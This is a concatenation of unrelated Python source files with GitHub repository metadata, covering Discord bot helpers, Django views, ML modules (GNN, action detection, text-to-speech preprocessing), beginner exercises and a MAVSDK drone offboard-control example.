if delete_response:
try:
await value.delete()
except discord.HTTPException:
pass
return ret
except asyncio.TimeoutError:
return None
async def react_confirm(self, message: discord.Message, *, timeout=60.0, delete_after=False,
use_checkmark=False) -> Optional[bool]:
"""Waits for the command author to reply with a Y or N reaction.
Returns True if the user reacted with Y
Returns False if the user reacted with N
Returns None if the user didn't react at all
:param message: The message that will contain the reactions.
:param timeout: The maximum time to wait for reactions
:param delete_after: Whether to delete or not the message after finishing.
:param use_checkmark: Whether to use or not checkmarks instead of Y/N
:return: True if reacted with Y, False if reacted with N, None if timeout.
"""
if not self.channel.permissions_for(self.me).add_reactions:
raise RuntimeError('Bot does not have Add Reactions permission.')
reactions = self.check_reactions if use_checkmark else self.yes_no_reactions
for emoji in reactions:
emoji = emoji.replace("<", "").replace(">", "")
await message.add_reaction(emoji)
def check_react(reaction: discord.Reaction, user: discord.User):
if reaction.message.id != message.id:
return False
if user.id != self.author.id:
return False
if reaction.emoji not in reactions:
return False
return True
try:
react = await self.bot.wait_for("reaction_add", timeout=timeout, check=check_react)
if react[0].emoji == reactions[1]:
return False
except asyncio.TimeoutError:
return None
finally:
if delete_after:
await message.delete()
elif self.guild is not None:
try:
await message.clear_reactions()
except discord.Forbidden:
pass
return True
def tick(self, value: bool = True, label: str = None) -> str:
"""Displays a checkmark or a cross depending on the value.
:param value: The value to evaluate
:param label: An optional label to display
:return: A checkmark or cross
"""
emoji = self.check_reactions[int(not value)]
if label:
return emoji + label
return emoji
|
[
"allan.galarza@gmail.com"
] |
allan.galarza@gmail.com
|
606666b357f61e92cee16a6e4c4e25719ab20b3b
|
6a7534af8890e92d05634b7fdc84a5995feb5820
|
/mysite0/article/migrations/0001_initial.py
|
69230fcfec233ef7bd2796cd9f5fea087cb7d40f
|
[] |
no_license
|
msyyyy/yywdjango
|
407115c2b09332683909d910b9eae7bbd6619516
|
1bb1857b2476b9e5f19455002f6c29b7c81aae22
|
refs/heads/master
| 2020-04-08T15:01:33.291845
| 2019-02-28T14:14:25
| 2019-02-28T14:14:25
| 159,462,318
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 536
|
py
|
# Generated by Django 2.1.3 on 2018-11-29 11:57
from django.db import migrations, models
class Migration(migrations.Migration):
initial = True
dependencies = [
]
operations = [
migrations.CreateModel(
name='Article',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('title', models.CharField(max_length=30)),
('content', models.TextField()),
],
),
]
|
[
"243574589@qq.com"
] |
243574589@qq.com
|
64fe03e29e8fc14b706bc7544aebfa30cb1ff528
|
45a0234d1c7df8f605a29484fca838ffcbf82ad2
|
/clustering.py
|
81ee745b519df889fc9741a334cc57bfbedc3aab
|
[] |
no_license
|
Dhavin/Sentiment-analysis-for-Stock-market
|
ba44cb51672094f53c1b328fed39b225147660ff
|
b2d18aabd04e1cfadd5694172c9daeb606cc944a
|
refs/heads/main
| 2023-04-09T06:59:38.905926
| 2021-04-23T18:23:54
| 2021-04-23T18:23:54
| 360,968,820
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,686
|
py
|
import pandas as pd
from scipy import stats
from sklearn.cluster import KMeans
from sklearn.decomposition import PCA
import matplotlib.pyplot as plt
import seaborn as sns
import sys
#from mpl_toolkits.mplot3d import Axes3D
f = input('Enter a Stock : ')
df = pd.read_csv('sentimentdata/'+ f +'sentiment.csv',index_col=0,
encoding='latin-1')
dfold = df
df = df.drop('text', 1)
print(df.head())
df = df.drop('date', 1)
print(df.head())
df_tr = df
# select proper number of clusters
'''
Y = df[['followers']]
X = df[['polarity']]
Nc = range(1, 20)
kmeans = [KMeans(n_clusters=i) for i in Nc]
score = [kmeans[i].fit(Y).score(Y) for i in range(len(kmeans))]
plt.plot(Nc,score)
plt.xlabel('Number of Clusters')
plt.ylabel('Score')
plt.title('Elbow Curve')
plt.show()
'''
# elbow plot showed the point of dropoff to be around 5 clusters
#Standardize
clmns = ['followers', 'polarity', 'sentiment_confidence']
df_tr_std= stats.zscore(df_tr[clmns])
#Clustering
kmeans = KMeans(n_clusters=5, random_state=0).fit(df_tr_std)
labels = kmeans.labels_
#Glue back to original data
df_tr['clusters']=labels
dfold['clusters']=labels
clmns.extend(['clusters'])
print(df_tr[clmns].groupby(['clusters']).mean())
#Scatter plot of polarity and confidence
sns.lmplot('polarity', 'sentiment_confidence',
data=df_tr,
fit_reg=False,
hue="clusters",
scatter_kws={"marker": "D",
"s": 20})
dfold.to_csv('clusterdata/'+ f +'cluster.csv')
plt.title('tweets grouped by polarity and sentiment_confidence')
plt.xlabel('polarity')
plt.ylabel('sentiment_confidences')
plt.show()
|
[
"noreply@github.com"
] |
Dhavin.noreply@github.com
|
a6a347bcf7b13c2043bbaeac195ca1cbb8d5904d
|
a837ba2fd2423a149b952d8ec27c7a08caf00b4f
|
/Input/venv/Scripts/easy_install-script.py
|
7860f47d6ae26894852a1f6183b4778723c2378a
|
[] |
no_license
|
MajidSalimi/Python-Learning
|
7b4ab7834d6391406b8e10f1ad0c43a8e40b5ca6
|
eca845bf2f4fecd89540399bd09282971808fedf
|
refs/heads/master
| 2021-04-02T02:14:30.855096
| 2020-03-28T16:34:23
| 2020-03-28T16:34:23
| 248,233,488
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 454
|
py
|
#!"D:\My Codes\Python\Python-Learning\Input\venv\Scripts\python.exe"
# EASY-INSTALL-ENTRY-SCRIPT: 'setuptools==40.8.0','console_scripts','easy_install'
__requires__ = 'setuptools==40.8.0'
import re
import sys
from pkg_resources import load_entry_point
if __name__ == '__main__':
sys.argv[0] = re.sub(r'(-script\.pyw?|\.exe)?$', '', sys.argv[0])
sys.exit(
load_entry_point('setuptools==40.8.0', 'console_scripts', 'easy_install')()
)
|
[
"majidsalimib@gmail.com"
] |
majidsalimib@gmail.com
|
7c90494584f621071a20521100575a99fac1e69a
|
2ac003feba0877c9c5aac73da69e778909daf4d1
|
/python_notes/python_102/nested_list/nested_list.py
|
d9595014d16e1f91f223eef767f22674afbc5197
|
[] |
no_license
|
rcollins22/ClassNotes
|
5aefc6f2027ce32b3bda3a00751b48869b34e137
|
0ce39f9170beafc1fb949f2327902d878c14b593
|
refs/heads/master
| 2023-03-03T15:19:57.846513
| 2020-08-24T15:00:59
| 2020-08-24T15:00:59
| 269,222,537
| 3
| 1
| null | 2023-02-28T23:01:50
| 2020-06-04T00:20:50
|
JavaScript
|
UTF-8
|
Python
| false
| false
| 2,062
|
py
|
""" #STRINGS AND LISTS CAN BE NESTED TOGETHER IN AN ARRAY #LISTS CAN BE MADE UP OF OTHER LISTS!!###
atl=['buckhead',
['krog','westside','o4w'] ,
'hapeville'
]
print(atl[1]) #PRINTS ['krog', 'westside', 'o4w']
print(atl[0]) #PRINTS 'buckhead'
#YOU CAN ASSIGN INDEXED ITEMS TO VARIABLES
neighborhoods=atl[1]
print(neighborhoods) #PRINTS ['krog', 'westside', 'o4w']
#LOOPING THROUGH LISTS of LISTS
atlanta=['atv', 'lenox', 'phipps']
,['piedmont', 'pride', 'vortex']
,['ormsbys', 'marcel', 'terminal']
idx_1=0
for wtd in atlanta:
idx_2 =0
print("%s. %s" % ((idx_1+1),group))
"""
#-----------------------------------------------------------------------------------------------------------------------
""" Create a program that prints the ingredients of your 3 favorite foods.
The ingredients must be in a list inside of the foods list
Before each food print "Food # X has the following ingredients". Where X is the index of the food.
(Challange) You can only use the for in operation.
(Extra Challenge) Make it a quiz game of guess the food based on its ingredients. Add more food items if needed. """
fav_food=[['Cheesecake','Cheese','Milk','Eggs'],['Cheesesticks','Bread','Mozzerella','Marinara'],['Mochi','Rice Flour', 'Ice Cream','Matcha']]
[cheesecake,cheese_sticks,mochi]=fav_food
for food in fav_food:
print('%s has the following ingredients:\n%s' % (food[0],food[1:])) ##PRINTS: Cheesecake has the following ingredients:
# ['Cheese', 'Milk', 'Eggs'] etc...
fav_food=[['Cheese','Milk','Eggs'],
['Bread','Mozzerella','Marinara'],
['Rice Flour', 'Ice Cream','Matcha']]
idx=0
for food in fav_food:
print("Food #%d has the following ingredients: " % (idx + 1)) #idx IS AN INDEX(base) NUMBER
for i in fav_food[idx]: #
print(" %s" % i)
idx+=1
|
[
"rashad.collins22@gmail.com"
] |
rashad.collins22@gmail.com
|
76330de0a4c96a0b15569777959c84585de7152f
|
a5a76c9fc62917fd125b2b8c1e1a05abf50cd3f6
|
/models/necks/basic.py
|
49a67c24acf51c69c50332af61f221fc5018fe6b
|
[
"Apache-2.0"
] |
permissive
|
CV-IP/ACAR-Net
|
cf8b1f4ce088a076fb85ed94dbe189c205a9f9a5
|
d684203eabda68b882c0b959b69e44a7bab1f247
|
refs/heads/master
| 2023-08-18T19:39:20.211051
| 2021-10-08T09:20:14
| 2021-10-08T09:20:14
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 3,368
|
py
|
import torch
import torch.nn as nn
from .utils import bbox_jitter, get_bbox_after_aug
__all__ = ['basic']
class BasicNeck(nn.Module):
def __init__(self, aug_threshold=0., bbox_jitter=None, num_classes=60, multi_class=True):
super(BasicNeck, self).__init__()
# threshold on preserved ratio of bboxes after cropping augmentation
self.aug_threshold = aug_threshold
# config for bbox jittering
self.bbox_jitter = bbox_jitter
self.num_classes = num_classes
self.multi_class = multi_class
# data: aug_info, labels, filenames, mid_times
# returns: num_rois, rois, roi_ids, targets, sizes_before_padding, filenames, mid_times, bboxes, bbox_ids
def forward(self, data):
rois, roi_ids, targets, sizes_before_padding, filenames, mid_times = [], [0], [], [], [], []
bboxes, bbox_ids = [], [] # used for multi-crop fusion
cur_bbox_id = -1 # record current bbox no.
for idx in range(len(data['aug_info'])):
aug_info = data['aug_info'][idx]
pad_ratio = aug_info['pad_ratio']
sizes_before_padding.append([1. / pad_ratio[0], 1. / pad_ratio[1]])
for label in data['labels'][idx]:
cur_bbox_id += 1
if self.training and self.bbox_jitter is not None:
bbox_list = bbox_jitter(label['bounding_box'],
self.bbox_jitter.get('num', 1),
self.bbox_jitter.scale)
else:
# no bbox jittering during evaluation
bbox_list = [label['bounding_box']]
for b in bbox_list:
bbox = get_bbox_after_aug(aug_info, b, self.aug_threshold)
if bbox is None:
continue
rois.append([idx] + bbox)
filenames.append(data['filenames'][idx])
mid_times.append(data['mid_times'][idx])
bboxes.append(label['bounding_box'])
bbox_ids.append(cur_bbox_id)
if self.multi_class:
ret = torch.zeros(self.num_classes)
ret.put_(torch.LongTensor(label['label']),
torch.ones(len(label['label'])))
else:
ret = torch.LongTensor(label['label'])
targets.append(ret)
roi_ids.append(len(rois))
num_rois = len(rois)
if num_rois == 0:
return {'num_rois': 0, 'rois': None, 'roi_ids': roi_ids, 'targets': None,
'sizes_before_padding': sizes_before_padding,
'filenames': filenames, 'mid_times': mid_times, 'bboxes': bboxes, 'bbox_ids': bbox_ids}
rois = torch.FloatTensor(rois).cuda()
targets = torch.stack(targets, dim=0).cuda()
return {'num_rois': num_rois, 'rois': rois, 'roi_ids': roi_ids, 'targets': targets,
'sizes_before_padding': sizes_before_padding,
'filenames': filenames, 'mid_times': mid_times, 'bboxes': bboxes, 'bbox_ids': bbox_ids}
def basic(**kwargs):
model = BasicNeck(**kwargs)
return model
|
[
"siyuchen@pku.edu.cn"
] |
siyuchen@pku.edu.cn
|
181b41fd843958312207675173b1998d69b55da7
|
e2efe41ab152c58dc0c1786f0859e6c6b6c4dafd
|
/info/modules/profile/__init__.py
|
548a39d31bbd8861fda7850b893730da729123ad
|
[] |
no_license
|
lyancode/information_test
|
5c8010a87078c43b22c86c73bd27a7326eaa60ca
|
463a08b3d78d12cb0b5aef12ee9d9f884ec187bd
|
refs/heads/master
| 2020-04-01T06:56:32.718491
| 2018-10-24T02:42:12
| 2018-10-24T02:42:12
| 152,970,306
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 194
|
py
|
# 登录注册的相关业务逻辑都放在当前模块
from flask import Blueprint
# 创建蓝图对象
profile_blue = Blueprint("profile", __name__, url_prefix="/user")
from . import views
|
[
"liyan__mail@163.com"
] |
liyan__mail@163.com
|
27f9922179f74d0548db5048709e1cebd75eb668
|
2b99ae73409249692f45cc0175e52848cd048263
|
/code/src/plan2scene/texture_prop/tp_models/simple_gated_gnn.py
|
b38d90e869cb901a5628e659ee345888cdf29287
|
[
"MIT"
] |
permissive
|
ViLahte/plan2scene
|
dc3521ec6262947e0ed1e8c15f8e2db77fc1c095
|
b1310e7885dd74bd93a7f93ff4dacdb25ae704e4
|
refs/heads/main
| 2023-06-15T15:30:13.226011
| 2021-07-01T20:29:15
| 2021-07-01T20:29:15
| 377,935,065
| 0
| 0
|
MIT
| 2021-06-17T19:05:07
| 2021-06-17T19:05:07
| null |
UTF-8
|
Python
| false
| false
| 3,472
|
py
|
import torch
import torch.nn.functional as F
from torch import nn
from torch_geometric.data import Batch
from torch_geometric.nn import SAGEConv, GatedGraphConv
from plan2scene.config_manager import ConfigManager
def generate_extended_linear(count: int):
"""
Returns a helper method which generates a sequential network of linear layers.
:param count: Length of the chain
:return: Method that can generate a chain of linear layers.
"""
def generate_linear(input_dim: int, body_dim: int, output_dim: int):
"""
Generates a sequential network of linear layers, having the specified input dim, hidden layer dim and output dim.
:param input_dim: Input dimensions of the chain
:param body_dim: Hidden layer dimensions of the chain
:param output_dim: Output dimensions of the chain
:return: Sequential network of linear layers.
"""
layers = []
for i in range(count):
if i > 0:
layers.append(nn.ReLU())
if i == 0:
in_dim = input_dim
else:
in_dim = body_dim
if i == count - 1:
out_dim = output_dim
else:
out_dim = body_dim
layers.append(nn.Linear(in_dim, out_dim))
return nn.Sequential(*layers)
return generate_linear
class SimpleGatedGNN(torch.nn.Module):
"""
Neural network used for texture propagation.
"""
def __init__(self, conf: ConfigManager, gated_layer_count: int, linear_count: int = 1, linear_layer_multiplier: int = 1):
"""
Initialize network.
:param conf: Config manager
:param gated_layer_count: Number of layers of the gated graph convolution operator from https://arxiv.org/abs/1511.05493.
:param linear_count: Number of linear layers at the front and back of the GNN.
:param linear_layer_multiplier: Multiplier on width of linear layers.
"""
super(SimpleGatedGNN, self).__init__()
self.conf = conf
linear_layer = generate_extended_linear(linear_count)
self.linear1 = linear_layer(conf.texture_prop.node_embedding_dim,
conf.texture_prop.node_embedding_dim * linear_layer_multiplier,
conf.texture_prop.node_embedding_dim * linear_layer_multiplier)
self.conv1 = GatedGraphConv(out_channels=conf.texture_prop.node_embedding_dim * linear_layer_multiplier,
num_layers=gated_layer_count)
self.linear2 = linear_layer(conf.texture_prop.node_embedding_dim * linear_layer_multiplier,
conf.texture_prop.node_embedding_dim * linear_layer_multiplier,
conf.texture_prop.node_target_dim)
def forward(self, data: Batch) -> torch.Tensor:
"""
Forward pass. Returns a tensor of embeddings. Each entry of the batch represent texture embeddings predicted for a room.
:param data: Batch of input data.
:return: tensor [batch_size, surface_count, embedding dim]
"""
bs, _ = data.x.shape
x, edge_index = data.x, data.edge_index
x = self.linear1(x)
x = F.relu(x)
x = self.conv1(x, edge_index)
x = F.relu(x)
x = self.linear2(x)
return x.view(bs, len(self.conf.surfaces), self.conf.texture_gen.combined_emb_dim)
|
[
"mvidanap@sfu.ca"
] |
mvidanap@sfu.ca
|
e5a704d957c0c637f67a74b1e84a70c337b2c631
|
09445fa6d9a8ffbe8af93b2054d1c0d6ef541b9a
|
/accounts/views.py
|
1dc237fc076e193d682c2fcae85d0024fe4ace4c
|
[] |
no_license
|
besssli/CSX2018DjangoTest
|
e610bd86cd980399cad2aa13689d7ef8ac165f0f
|
d951c73eb3bdf1a41c9363de57e2a27020818226
|
refs/heads/master
| 2020-03-29T09:05:51.938765
| 2018-11-09T01:32:38
| 2018-11-09T01:32:38
| 149,741,345
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,208
|
py
|
from django.shortcuts import render, redirect
from django.contrib.auth.forms import UserCreationForm, AuthenticationForm
from django.contrib.auth import login, logout
# Create your views here.
def signup_view(request):
if request.method == 'POST':
form = UserCreationForm(request.POST)
if form.is_valid():
user = form.save()
# log the user in
login(request,user)
return redirect('articles:list')
else:
form = UserCreationForm()
return render(request,'accounts/signup.html',{'form':form})
def login_view(request):
if request.method == 'POST':
form = AuthenticationForm(data=request.POST)
if form.is_valid():
# log in the user
user = form.get_user()
login(request,user)
if 'next' in request.POST:
return redirect(request.POST.get('next'))
else:
return redirect('articles:list')
else:
form = AuthenticationForm()
return render(request,'accounts/login.html',{'form':form})
def logout_view(request):
if request.method == 'POST':
logout(request)
return redirect('articles:list')
|
[
"32564690+besssli@users.noreply.github.com"
] |
32564690+besssli@users.noreply.github.com
|
97d64b5f37844028007a1cfea36d95e2507f501c
|
e212d9b85df5962c8ebf9e737b825fa3fe89f3d6
|
/WaveRNN/utility/text/__init__.py
|
0b9d8cc2401057deb5c8f63699658b5395afb09c
|
[
"MIT"
] |
permissive
|
sankar-mukherjee/Expressive-Speech-Synthesis-Research
|
9c3ea564509324dbfe033a328edd45aa7bffeffa
|
d85a067a131c04944f5bbe7fa7ab8c26e7d83800
|
refs/heads/master
| 2023-01-28T05:01:17.371683
| 2020-12-16T11:43:15
| 2020-12-16T11:43:15
| 294,351,192
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 2,187
|
py
|
""" from https://github.com/keithito/tacotron """
import re
from utility.text import cleaners
from utility.text.symbols import symbols
# Mappings from symbol to numeric ID and vice versa:
_symbol_to_id = {s: i for i, s in enumerate(symbols)}
_id_to_symbol = {i: s for i, s in enumerate(symbols)}
# Regular expression matching text enclosed in curly braces:
_curly_re = re.compile(r'(.*?)\{(.+?)\}(.*)')
def text_to_sequence(text, cleaner_names):
'''Converts a string of text to a sequence of IDs corresponding to the symbols in the text.
The text can optionally have ARPAbet sequences enclosed in curly braces embedded
in it. For example, "Turn left on {HH AW1 S S T AH0 N} Street."
Args:
text: string to convert to a sequence
cleaner_names: names of the cleaner functions to run the text through
Returns:
List of integers corresponding to the symbols in the text
'''
sequence = []
# Check for curly braces and treat their contents as ARPAbet:
while len(text):
m = _curly_re.match(text)
if not m:
sequence += _symbols_to_sequence(_clean_text(text, cleaner_names))
break
sequence += _symbols_to_sequence(_clean_text(m.group(1), cleaner_names))
sequence += _arpabet_to_sequence(m.group(2))
text = m.group(3)
return sequence
def sequence_to_text(sequence):
'''Converts a sequence of IDs back to a string'''
result = ''
for symbol_id in sequence:
if symbol_id in _id_to_symbol:
s = _id_to_symbol[symbol_id]
# Enclose ARPAbet back in curly braces:
if len(s) > 1 and s[0] == '@':
s = '{%s}' % s[1:]
result += s
return result.replace('}{', ' ')
def _clean_text(text, cleaner_names):
for name in cleaner_names:
cleaner = getattr(cleaners, name)
if not cleaner:
raise Exception('Unknown cleaner: %s' % name)
text = cleaner(text)
return text
def _symbols_to_sequence(symbols):
return [_symbol_to_id[s] for s in symbols if _should_keep_symbol(s)]
def _arpabet_to_sequence(text):
return _symbols_to_sequence(['@' + s for s in text.split()])
def _should_keep_symbol(s):
return s in _symbol_to_id and s is not '_' and s is not '~'
|
[
"sankar1535@gmail.com"
] |
sankar1535@gmail.com
|
a23cc982e760acbf55a579b0d8829327af32289b
|
e9a33230671bd7e099c11943ec056f84b6a9e24b
|
/jaal_call.py
|
b2ae8e2a72ebbbaeda09cb9d5df50b979976757a
|
[
"MIT"
] |
permissive
|
Olshansk/jaal
|
52c49dcaaa1d4be21d1474c7739f4e5af9eb971a
|
2b1e4696ca0d3d8f074827e5ae2943817eaa88e7
|
refs/heads/main
| 2023-05-31T13:45:57.443046
| 2021-05-23T09:42:57
| 2021-05-23T09:42:57
| 340,232,097
| 1
| 0
|
MIT
| 2021-02-19T02:04:16
| 2021-02-19T02:04:16
| null |
UTF-8
|
Python
| false
| false
| 526
|
py
|
# import
from jaal import Jaal
from jaal.datasets import load_got
# load the data
edge_df, node_df = load_got()
# define vis options
vis_opts = {'height': '600px', # change height
'interaction':{'hover': True}, # turn on-off the hover
'physics':{'stabilization':{'iterations': 100}}} # define the convergence iteration of network
# init Jaal and run server (with opts)
Jaal(edge_df, node_df).plot(vis_opts=vis_opts)
# init Jaal and run server (with default options)
# Jaal(edge_df, node_df).plot()
|
[
"mohitmayank1@gmail.com"
] |
mohitmayank1@gmail.com
|
cc60ef58e4a055c25e2d8445b6458c78dbffbca6
|
c171c9a15a782635477a95693349e6d76531ca84
|
/maps/utils.py
|
a132652e6f3ecd51e5b68923c5b5c812025c0a94
|
[] |
no_license
|
xiaoyali97/CS61A
|
5a9d1e9f57135ab576d5c6599d327c305db4fb17
|
f8dffa388b04ca535e8d43f3e5342d356a58a246
|
refs/heads/master
| 2020-03-18T10:52:05.434470
| 2018-05-24T00:05:55
| 2018-05-24T00:05:55
| 134,637,774
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 2,309
|
py
|
"""Utilities for Maps"""
from math import sqrt
from random import sample
# Rename the built-in zip (http://docs.python.org/3/library/functions.html#zip)
_zip = zip
def map_and_filter(s, map_fn, filter_fn):
"""Returns a new list containing the results of calling map_fn on each
element of sequence s for which filter_fn returns a true value.
>>> square = lambda x: x * x
>>> is_odd = lambda x: x % 2 == 1
>>> map_and_filter([1, 2, 3, 4, 5], square, is_odd)
[1, 9, 25]
"""
# BEGIN Question 0
return [map_fn(x) for x in s if filter_fn(x)]
# END Question 0
def key_of_min_value(d):
"""Returns the key in a dict d that corresponds to the minimum value of d.
>>> letters = {'a': 6, 'b': 5, 'c': 4, 'd': 5}
>>> min(letters)
'a'
>>> key_of_min_value(letters)
'c'
"""
# BEGIN Question 0
return [key for key in d if d[key] == min([d[key] for key in d])][0]
# END Question 0
def zip(*sequences):
"""Returns a list of lists, where the i-th list contains the i-th
element from each of the argument sequences.
>>> zip(range(0, 3), range(3, 6))
[[0, 3], [1, 4], [2, 5]]
>>> for a, b in zip([1, 2, 3], [4, 5, 6]):
... print(a, b)
1 4
2 5
3 6
>>> for triple in zip(['a', 'b', 'c'], [1, 2, 3], ['do', 're', 'mi']):
... print(triple)
['a', 1, 'do']
['b', 2, 're']
['c', 3, 'mi']
"""
return list(map(list, _zip(*sequences)))
def enumerate(s, start=0):
"""Returns a list of lists, where the i-th list contains i+start and
the i-th element of s.
>>> enumerate([6, 1, 'a'])
[[0, 6], [1, 1], [2, 'a']]
>>> enumerate('five', 5)
[[5, 'f'], [6, 'i'], [7, 'v'], [8, 'e']]
"""
# BEGIN Question 0
return [[i+start] + [s[i]] for i in range(len(s))]
# END Question 0
def distance(pos1, pos2):
"""Returns the Euclidean distance between pos1 and pos2, which are pairs.
>>> distance([1, 2], [4, 6])
5.0
"""
return sqrt((pos1[0] - pos2[0]) ** 2 + (pos1[1] - pos2[1]) ** 2)
def mean(s):
"""Returns the arithmetic mean of a sequence of numbers s.
>>> mean([-1, 3])
1.0
>>> mean([0, -3, 2, -1])
-0.5
"""
# BEGIN Question 1
assert len(s) != 0
return sum(s) / len(s)
# END Question 1
|
[
"lixiaoyachina@hotmail.com"
] |
lixiaoyachina@hotmail.com
|
ee763c76f0898b4f6f1fde32c910a76b592f04fa
|
1e5f62eab69973af4ae8641c69bf730232b84549
|
/src/test/debug/test
|
fd48f22c770f4aaf53e89e94021b48ae56f5b628
|
[
"MIT"
] |
permissive
|
sbrichardson/aphros
|
c85e37d052df07f4f9971244c49f3713ffac77a5
|
3f93f4aa83c8ad36cb2f9ed9bd522f4a019829b0
|
refs/heads/master
| 2023-03-09T22:53:51.830606
| 2021-02-25T22:49:07
| 2021-02-25T22:49:07
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 180
|
#!/usr/bin/env python3
import aphros
class Test(aphros.TestBase):
def run(self):
self.runcmd("./t.debug | ./strippath > out")
return ["out"]
Test().main()
|
[
"kpetr@ethz.ch"
] |
kpetr@ethz.ch
|
|
1f1529473302b02d543365662b5ea486c153d200
|
0cf7dd2c3c0b28b52f1273e8fe2ea0a87cacc6af
|
/ToLeftandRight.py
|
b17d2c4f0c6445bb843c71a099e74b7f273f481e
|
[] |
no_license
|
EngrDevDom/Everyday-Coding-in-Python
|
61b0e4fcbc6c7f399587deab2fa55763c9d519b5
|
93329ad485a25e7c6afa81d7229147044344736c
|
refs/heads/master
| 2023-02-25T05:04:50.051111
| 2021-01-30T02:43:40
| 2021-01-30T02:43:40
| 274,971,215
| 1
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 422
|
py
|
# ToLeftandRight.py
nums = []
num_of_space = 0
current_num = int(input("Enter a number: "))
nums.append(current_num)
while True:
num = int(input("Enter a number: "))
if num > current_num: num_of_space += 1
elif num == current_num: continue
else: num_of_space -= 1
current_num = num
nums.append(" " * num_of_space + str(num))
if num_of_space == 0: break
for num in nums: print(num)
|
[
"60880034+EngrDevDom@users.noreply.github.com"
] |
60880034+EngrDevDom@users.noreply.github.com
|
3cc3eff0e75bc844fb12fcaa253b0afbd4c3e476
|
1a6d5f58a5aaf478e3af1a880f155a2bcbd06aff
|
/PX4/MAVSDK-Python/offboard_velocity_body.py
|
d14407e6d1504bb49547099d1e336c087e9f2eaa
|
[
"MIT"
] |
permissive
|
yingshaoxo/suicide-squad
|
5b8858376bffe9d80e66debbd75e83b6fb6f5b6e
|
cadbd0d48e860a8747b59190fc67a5a114c3462b
|
refs/heads/master
| 2020-11-24T02:46:38.604339
| 2019-10-29T05:47:44
| 2019-10-29T05:47:44
| 227,932,669
| 6
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 3,055
|
py
|
#!/usr/bin/env python3
"""
Some caveats when attempting to run the examples in non-gps environments:
- `drone.action.arm()` will return a `COMMAND_DENIED` result because the action requires switching
to LOITER mode first, something that is currently not supported in a non-gps environment. You will
need to temporarily disable this part here:
`https://github.com/mavlink/MAVSDK/blob/develop/plugins/action/action_impl.cpp#L61-L65`
- `drone.offboard.stop()` will also return a `COMMAND_DENIED` result because it requires a mode
switch to HOLD, something that is currently not supported in a non-gps environment.
"""
import asyncio
from mavsdk import System
from mavsdk import (OffboardError, VelocityBodyYawspeed)
async def run():
""" Does Offboard control using velocity body coordinates. """
drone = System()
await drone.connect(system_address="udp://:14540")
# Set parameters
await drone.param.set_float_param("MIS_TAKEOFF_ALT", 1.0) # set takeoff height to 1 meter
await drone.param.set_int_param("COM_TAKEOFF_ACT", 0) # hold after takeoff
await drone.param.set_int_param("COM_OBL_ACT", 0) # 0: land if lost offboard signal; 1: hold if lost offboard signal
# Start parallel tasks
asyncio.ensure_future(print_altitude(drone))
print("-- Arming")
await drone.action.arm()
print("-- Setting initial setpoint")
await drone.offboard.set_velocity_body(VelocityBodyYawspeed(0.0, 0.0, 0.0, 0.0))
print("-- Starting offboard")
try:
await drone.offboard.start()
except OffboardError as error:
print(f"Starting offboard mode failed with error code: {error._result.result}")
print("-- Disarming")
await drone.action.disarm()
return
print("-- Turn clock-wise and climb")
await drone.offboard.set_velocity_body(VelocityBodyYawspeed(0.0, 0.0, -1, 0.0))
await asyncio.sleep(5)
print("-- Turn clock-wise and climb")
await drone.offboard.set_velocity_body(VelocityBodyYawspeed(0.0, 0.1, 0.0, 0.0))
await asyncio.sleep(5)
print("-- Wait for a bit")
await drone.offboard.set_velocity_body(VelocityBodyYawspeed(0.0, -0.1, 0.0, 0.0))
await asyncio.sleep(5)
print("-- Wait for a bit")
await drone.offboard.set_velocity_body(VelocityBodyYawspeed(0.0, 0.0, 0.0, 2.0))
await asyncio.sleep(20)
print("-- Stopping offboard")
try:
await drone.offboard.stop()
except OffboardError as error:
print(f"Stopping offboard mode failed with error code: {error._result.result}")
print("-- Landing")
await drone.action.land()
async def print_altitude(drone):
""" Prints the altitude when it changes """
previous_altitude = None
async for position in drone.telemetry.position():
altitude = round(position.relative_altitude_m)
if altitude != previous_altitude:
previous_altitude = altitude
print(f"Altitude: {altitude}")
if __name__ == "__main__":
loop = asyncio.get_event_loop()
loop.run_until_complete(run())
|
[
"yingshaoxo@gmail.com"
] |
yingshaoxo@gmail.com
|
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.